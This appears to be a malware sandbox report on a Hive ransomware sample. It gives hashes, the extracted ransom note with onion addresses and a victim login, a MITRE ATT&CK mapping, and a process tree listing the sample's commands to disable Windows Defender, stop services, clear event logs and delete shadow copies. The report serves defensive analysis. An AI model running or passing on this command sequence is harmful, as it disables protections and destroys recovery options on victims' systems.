Overview

overview

10

Static

static

3

2025-03-12...ch.exe

windows7-x64

10

2025-03-12...ch.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    115s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/03/2025, 01:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe

  • Size

    3.7MB

  • MD5

    074ce128e23528f00e98eac6ae9a6618

  • SHA1

    39b2c91abb87af6399a7befab2fc100a03631258

  • SHA256

    04371796ab1e77b188bf8f1007466552b2faf7176918f3e0b6ce499d3ba57411

  • SHA512

    1db6635586bd506d4ca98e6be8b759fcfb8f44b7b6c3a96abf62986e4be49b5a04e3003dc379c8ea28342b3837ba71a32fa598125b8af001faebed9d8a23d97e

  • SSDEEP

    24576:ajAj4d2Cc/8o+1WkGHIvl4Bw5vJULHsbDwPD9cAXVCEbEWBgvM7eTVVfR35e7xLP:ayxIZk9FO5e1lqd/E+e7CZti1D1f

Score
10/10
hivedefense_evasiondiscoveryevasionexecutionimpactransomwarespywarestealertrojan

Malware Config

Extracted

Path

C:\Program Files\yxjL_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: 1i7Cpkz1ZCc4 Password: rX7WMQu6mrF6DBtf4eM2 To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.vsbnw files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.
URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

  • Disables service(s) 3 TTPs
    defense_evasionexecution
  • Hive

    A ransomware written in Golang first seen in June 2021.

    ransomwarehive
  • Hive family
    hive
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
    defense_evasiontrojan
  • Modifies security service 2 TTPs 1 IoCs
    defense_evasion
  • Clears Windows event logs 1 TTPs 3 IoCs
    defense_evasionransomware
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Renames multiple (1225) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (78) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Modifies Security services 2 TTPs 6 IoCs

    Modifies the startup behavior of a security service.

    defense_evasion
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe"
    1⤵
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4812
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SamSs" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:952
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2192
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SDRSVC" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2496
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SDRSVC" /y
        3⤵
          PID:2280
      • C:\Windows\SysWOW64\net.exe
        net.exe stop "SstpSvc" /y
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2932
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "SstpSvc" /y
          3⤵
          • System Location Discovery: System Language Discovery
          PID:700
      • C:\Windows\SysWOW64\net.exe
        net.exe stop "vmicvss" /y
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3388
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "vmicvss" /y
          3⤵
            PID:2056
        • C:\Windows\SysWOW64\net.exe
          net.exe stop "VSS" /y
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3948
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop "VSS" /y
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4588
        • C:\Windows\SysWOW64\net.exe
          net.exe stop "wbengine" /y
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3180
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop "wbengine" /y
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2356
        • C:\Windows\SysWOW64\net.exe
          net.exe stop "WebClient" /y
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3028
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop "WebClient" /y
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1040
        • C:\Windows\SysWOW64\net.exe
          net.exe stop "UnistoreSvc_276d3" /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3792
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop "UnistoreSvc_276d3" /y
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2636
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "SamSs" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:3924
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "SDRSVC" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:116
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "SstpSvc" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:4808
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "vmicvss" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:3600
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "VSS" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:4520
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "wbengine" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:3060
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "WebClient" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:1924
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "UnistoreSvc_276d3" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:4212
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
          2⤵
          • Modifies Security services
          • System Location Discovery: System Language Discovery
          PID:5116
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:808
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender DisableAntiSpyware settings
          • System Location Discovery: System Language Discovery
          PID:1128
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2836
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:3528
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:4672
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          • System Location Discovery: System Language Discovery
          PID:2384
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          • System Location Discovery: System Language Discovery
          PID:3940
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          • System Location Discovery: System Language Discovery
          PID:1700
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          • System Location Discovery: System Language Discovery
          PID:4552
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:3096
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1820
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1260
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:4240
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1720
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:4524
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
          2⤵
          • System Location Discovery: System Language Discovery
          PID:3488
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
          2⤵
          • System Location Discovery: System Language Discovery
          PID:4684
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
          2⤵
          • System Location Discovery: System Language Discovery
          PID:3380
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
          2⤵
          • System Location Discovery: System Language Discovery
          PID:4048
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1096
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2056
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:3780
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1332
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
          2⤵
            PID:4900
          • C:\Windows\SysWOW64\reg.exe
            reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2120
          • C:\Windows\SysWOW64\reg.exe
            reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
            2⤵
            • System Location Discovery: System Language Discovery
            PID:3360
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Modifies Security services
            • System Location Discovery: System Language Discovery
            PID:3788
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Modifies Security services
            • System Location Discovery: System Language Discovery
            PID:1136
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Modifies Security services
            • System Location Discovery: System Language Discovery
            PID:996
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Modifies Security services
            • System Location Discovery: System Language Discovery
            PID:4504
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Modifies security service
            • System Location Discovery: System Language Discovery
            PID:4136
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Modifies Security services
            • System Location Discovery: System Language Discovery
            PID:112
          • C:\Windows\SysWOW64\wevtutil.exe
            wevtutil.exe cl system
            2⤵
            • Clears Windows event logs
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1124
          • C:\Windows\SysWOW64\wevtutil.exe
            wevtutil.exe cl security
            2⤵
            • Clears Windows event logs
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:3300
          • C:\Windows\SysWOW64\wevtutil.exe
            wevtutil.exe cl application
            2⤵
            • Clears Windows event logs
            • Suspicious use of AdjustPrivilegeToken
            PID:2184
          • C:\Windows\SysWOW64\Wbem\wmic.exe
            wmic.exe SHADOWCOPY /nointeractive
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:5056
          • C:\Windows\SysWOW64\Wbem\wmic.exe
            wmic.exe shadowcopy delete
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2272
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
            2⤵
            • System Location Discovery: System Language Discovery
            PID:384
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
            2⤵
            • System Location Discovery: System Language Discovery
            PID:3800
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIOAVProtection $true
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1396
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
            2⤵
            • System Location Discovery: System Language Discovery
            PID:1708
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableRealtimeMonitoring $true
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:372
          • C:\Windows\SysWOW64\notepad.exe
            notepad.exe C:\yxjL_HOW_TO_DECRYPT.txt
            2⤵
            • System Location Discovery: System Language Discovery
            • Opens file in notepad (likely ransom note)
            PID:2176
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe"
            2⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            PID:1928
            • C:\Windows\SysWOW64\PING.EXE
              ping.exe -n 5 127.0.0.1
              3⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:4360

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        System Services

        1
        T1569

        Service Execution

        1
        T1569.002

        Windows Management Instrumentation

        1
        T1047

        Persistence

        Create or Modify System Process

        4
        T1543

        Windows Service

        4
        T1543.003

        Privilege Escalation

        Create or Modify System Process

        4
        T1543

        Windows Service

        4
        T1543.003

        Defense Evasion

        Impair Defenses

        3
        T1562

        Disable or Modify Tools

        2
        T1562.001

        Indicator Removal

        2
        T1070

        Clear Windows Event Logs

        1
        T1070.001

        File Deletion

        1
        T1070.004

        Modify Registry

        4
        T1112

        Credential Access

        Credentials from Password Stores

        1
        T1555

        Credentials from Web Browsers

        1
        T1555.003

        Unsecured Credentials

        1
        T1552

        Credentials In Files

        1
        T1552.001

        Discovery

        Remote System Discovery

        1
        T1018

        System Location Discovery

        1
        T1614

        System Language Discovery

        1
        T1614.001

        System Network Configuration Discovery

        1
        T1016

        Internet Connection Discovery

        1
        T1016.001

        Lateral Movement

        Collection

        Data from Local System

        1
        T1005

        Command and Control

        Exfiltration

        Impact

        Inhibit System Recovery

        1
        T1490

        Service Stop

        1
        T1489

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          711B

          MD5

          8bb62cfad37334a15129a0da2091d472

          SHA1

          a9f223eb2bd355c8cbf7d17db501db834f39cb6c

          SHA256

          94f76b160568e3705f1e0d2d6ff3ee6927bd812032498d373bbcc516af2864f7

          SHA512

          da08c15accffeca9c1ec985899ebf234aa881546dfb80862c72bfe206dfbf92772582ff87c0636ca0a4cdeeb03635de7a24aecacba86e22683a1d689724d6dab

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          683B

          MD5

          a0522ef468697e74b90c444ceb4aa17a

          SHA1

          31fa5bb9b4ada150c9001b6e9f3213644117187f

          SHA256

          57804748e775c08ae188b4d860f31e4482ab99b44ed1d8489780daa6756fb11c

          SHA512

          bbb91f8b3c204c4c04da2ad635eb18e9f224f73395dac509c438c0a645316162b6ff78e03e7af76d5da2d9e84cd0c4b5e9db1d4dc08bc3f524bcc55c1f4dbbd3

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          1KB

          MD5

          99a1fefa123aa745b30727cc5ad50126

          SHA1

          c48f74cee78f8ed8463634d80c4112f3e12bd566

          SHA256

          7a610114be56ff131462bc67f9a23bcd4fde4fdd0158691448ab9e4a3eb2ca3b

          SHA512

          504800f03a4aa57c1cfa15b28542382728b5f3dd85309fe12ebfd711980d78d15d8241d5f54956ee41da2cd65203b7764ab7b15119457b74ebc07fcf8e55a742

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          445B

          MD5

          ed537606a39879a091a8c085cf95ff38

          SHA1

          86c73d85094efbfdcd80abf119f03b64a71cbd0f

          SHA256

          42c312aa2a038ca54e9a6fe4bad8c9c044c35b4c5f421496f289c00c957d7591

          SHA512

          fc331c2e1ec84a6a83b51f365484033b3069d73c5987094cf526c45a92c3297df22fe2a35ec20382ed4d563ee604ecbdbdf17fb735f7e0118ab444b4d5db8e9d

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          611B

          MD5

          37d179c947c13f64b7b6356f57441032

          SHA1

          9d1c1bd0c370336c229baeb2cd7f80d7b3cf4d0a

          SHA256

          71039e6370f68913e67cb8451d3127c22d3e1045ca644e4dc9821e9f6f6899aa

          SHA512

          3034a8b9694bbde20be0f7fa2596fbca8fd3f1e45810b15a5cb1a2bc6f4ef852afc36639a56f82a4e582d74684724d5c4ee43cbf5e33c94c6cf00b3c059757bf

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          388B

          MD5

          6d8f7e9751f955452a9ceeb815456035

          SHA1

          e6903b2ec0f2c5632d4288f88d993d4a41f04527

          SHA256

          8bcf53efcb1b630087d4cfcedf5e48a7abaa9c71dd13745eedfd2c7cfa6827f5

          SHA512

          c869a94a224bce8ed553f5a86ffdea6d8a279e06a1c060b311cc52e4538b89e07fc0a4a76f85a28e2f62e8629a7c67101e990cc12bef2d0e2d6d7d3c1d4d7d90

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          552B

          MD5

          f364ee8508831e375004ac82b924efd5

          SHA1

          b04bc510ef53760bdd22ce0dd9d2e2f248c16df7

          SHA256

          87da831caa04bd303918a32265830ff97648dc8adc18881ba14d1cc1d28cde85

          SHA512

          399b2da615c0373214e3cf421f502fd0de02bdb9473da644e9f23df9ea7fc792da7d36bde61a456c2451276f74877232c8bedbe55e57098c1ffd13719206bac3

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_IgAAACIAAAA0.vsbnw
          Filesize

          388B

          MD5

          39be6b8bd8dce3ff5a1c20ac41ba993f

          SHA1

          a49d8a0c769601bf922c8aa1673bfd3a92d67855

          SHA256

          854a09f1f875a3a2e6566c593af465c9c8a3aa9b9112eb755bb09cee76224a63

          SHA512

          9fd5d4f02aa9d24ce9591ac0542d0abadf2b26208c3043220d2a0f036298199131ad804f9be20c6cc67f39e2921eebec65efb3a1e435ee7318fd8591fcc2fa2a

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          552B

          MD5

          b34c8c3b8117b038839beefa0df5a7ce

          SHA1

          c8d1e8eb4c71d5aa02e36fe3b7365374a9e4e32b

          SHA256

          bfef65c62bfc309f698e8e0b999edfc06ad272b87d805f183551c43f08d704a9

          SHA512

          89fa9f31f62c6e119e6280dbc475c35dd7bb37c27457732a0b1cb04809a35fec44a12ccb6a3a626586d596a0636d754a9ff79ecd9ed739c5c6edea50738a60d7

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          388B

          MD5

          2ca9f57d61ed45337ec4e6565480367f

          SHA1

          fa06ed14d72ad8ced6ad98a4e223bc80cccc5e75

          SHA256

          a584379ebf9aa0d3c0239edb7e1f114f01a9865f01c68494d5f28d410ba8d873

          SHA512

          83a172f2f304b2f634c313e248b62c11b7798f416872929ef233134bfc4ad8f44b1b4dfa123e8378a233417e1298a73088258f5671ace96ff677d1f26447de87

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_PAAAADwAAAA0.vsbnw
          Filesize

          552B

          MD5

          74af10749d7f19d15c8dca65a7453415

          SHA1

          dc96d9dbffe472600548dc64c724055e62620d8d

          SHA256

          0e0084df79ab98e5df48ed1e01987f7ac3fcf4a038dd5453708d868f73a073a8

          SHA512

          83d190bf6f9cb77894e7aaf84029c40a2a0335e43d08062ca2275a2cb7a784a29b3b7b8be820c7dfb2f1458ab0528fcdfe45f05491be673b30495e1ed916999e

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_pattern_RHP.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_JgAAACYAAAA0.vsbnw
          Filesize

          179B

          MD5

          117ec36a5cc6d82e63e8b3beae4a3099

          SHA1

          4c692192be53827f8ec8015ceb129f6e0f89e923

          SHA256

          041917c06c638a1b1accaf0d2f0b2a6dd335dea629de602e104553024d822ea4

          SHA512

          abb02a02a9161ece12464020676e880f1eed96b43a9dfd4f7ca06dc203fe633b0a712da5f151d36a5644d65aad7b2880c135df0bc42d7c1e61b44006807a8c9d

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          703B

          MD5

          ccc8d470e94b3441e41521572ba86ccd

          SHA1

          d294d7e78b596fefcc8084fab7917c54d3043e27

          SHA256

          a7cdf870b0b1b8459e94ed25a29daa87f5e9050294bf6cdff3bc72f93b928f94

          SHA512

